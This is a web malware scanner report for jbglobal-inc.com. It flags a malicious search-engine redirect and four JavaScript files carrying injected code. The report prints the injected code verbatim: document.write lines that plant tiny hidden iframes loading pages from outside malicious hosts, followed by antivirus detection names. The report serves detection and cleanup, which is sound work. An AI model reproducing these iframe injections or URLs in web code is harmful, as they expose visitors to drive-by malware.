Malware Scanner report for jbglobal-inc.com

Malicious/Suspicious/Total urls checked: 4/0/13

4 pages have malicious code. See details below

Blacklists: OK

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL:
->http://candice-accola.org/mocf.html?h=3203941
171 websites infected.

The website "jbglobal-inc.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 0/10/16

10 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://jbglobal-inc.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: jbglobal-inc.com Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 302 Found Connection: close Date: Mon, 15 Sep 2014 15:28:25 GMT Location: http://candice-accola.org/mocf.html?h=3203941 Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635 Content-Length: 229 Content-Type: text/html; charset=iso-8859-1	malicious

Scanned pages/files

Request	Server response	Status
http://jbglobal-inc.com/	200 OK Content-Length: 10242 Content-Type: text/html	clean
http://jbglobal-inc.com/scripts/user.js	200 OK Content-Length: 28644 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohm ... 3590 bytes are skipped ... else { coldvht3=coldvht1; } coldvht3=coldvht1; coldvht2=coldvht1; document.getElementById('colbody1').style.height = (coldvht1 - colheightofs) + 'px'; if(document.getElementById('colbody2')) { document.getElementById('colbody2').style.height = (coldvht2 - colheightofs) + 'px'; return; } if(document.getElementById('colbody3')) { document.getElementById('colbody3').style.height = (coldvht3 - colheightofs) + 'px'; } } Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=1477317 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=1477317> Hidden iFrame found. size: 2x2 src: http://ugoodn.com/amad.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941>
http://jbglobal-inc.com/scripts/jquery.js	200 OK Content-Length: 163 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941>
http://jbglobal-inc.com/scripts/simplegallery.js	200 OK Content-Length: 19847 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohm ... 3355 bytes are skipped ...ing.$captionpanel.find('div.gallerycaptiontext').get(0) }, getCookie:function(Name){ var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return null }, setCookie:function(name, value){ document.cookie = name+"=" + value + ";path=/" }, determineSlideShowHeight:function(setting){ return setting.highestImg + setting.longestDescHeight + 68 ; } } Antivirus reports: Qihoo-360 virus.html.url AntiVir HTML/TwitScroll.B Avast JS:Iframe-EHO [Trj] Ad-Aware Trojan.Iframe.CEG Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CEG Emsisoft Trojan.Iframe.CEG (B) Comodo TrojWare.JS.Iframe.FK McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.473 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CEG Tencent Html.Win32.Script.1500748 Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CEG VIPRE Malware.JS.Generic (JS) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CEG Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.JE BitDefender Trojan.Iframe.CEG Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941> Hidden iFrame found. size: 2x2 src: http://ugoodn.com/amad.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=1477317 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=1477317>
http://jbglobal-inc.com/scripts/photo_album.js	200 OK Content-Length: 314 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://ugoodn.com/amad.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941> Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941>
http://jbglobal-inc.com/home.html	200 OK Content-Length: 10241 Content-Type: text/html	clean
http://jbglobal-inc.com/aboutus.html	200 OK Content-Length: 10241 Content-Type: text/html	suspicious
Hidden iFrame found. size: 58x1 src: http://nmsbaseball.com/post.php?id=807333 <iframe name=twitter scrolling=auto frameborder=no align=center height=1 width=58 src=http://nmsbaseball.com/post.php?id=807333>
http://jbglobal-inc.com/ourshoes.html	200 OK Content-Length: 10243 Content-Type: text/html	clean
http://jbglobal-inc.com/globaldesigns.html	404 Not Found Content-Length: 575 Content-Type: text/html	clean
http://jbglobal-inc.com/test404page.js	404 Not Found Content-Length: 575 Content-Type: text/html	clean
http://jbglobal-inc.com/links.html	200 OK Content-Length: 10242 Content-Type: text/html	clean
http://jbglobal-inc.com/designerevents.html	200 OK Content-Length: 10242 Content-Type: text/html	clean
http://jbglobal-inc.com/contactus.html	200 OK Content-Length: 10242 Content-Type: text/html	clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jbglobal-inc.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://jbglobal-inc.com/

Result: jbglobal-inc.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for jbglobal-inc.com

Malware & Hack Repair

Website Hack Insurance

Malicious/Suspicious Redirects

Scanned pages/files

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools